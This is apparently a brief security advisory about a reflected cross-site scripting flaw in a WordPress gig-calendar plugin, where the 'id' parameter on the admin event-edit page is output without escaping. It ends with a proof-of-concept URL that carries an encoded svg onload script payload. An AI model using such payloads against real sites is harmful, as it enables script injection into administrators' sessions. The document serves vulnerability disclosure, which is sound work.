The plugin does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
https://example.comwp-admin/admin.php?page=mf_gig_calendar&action=edit&id=%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3B%3E%3C%22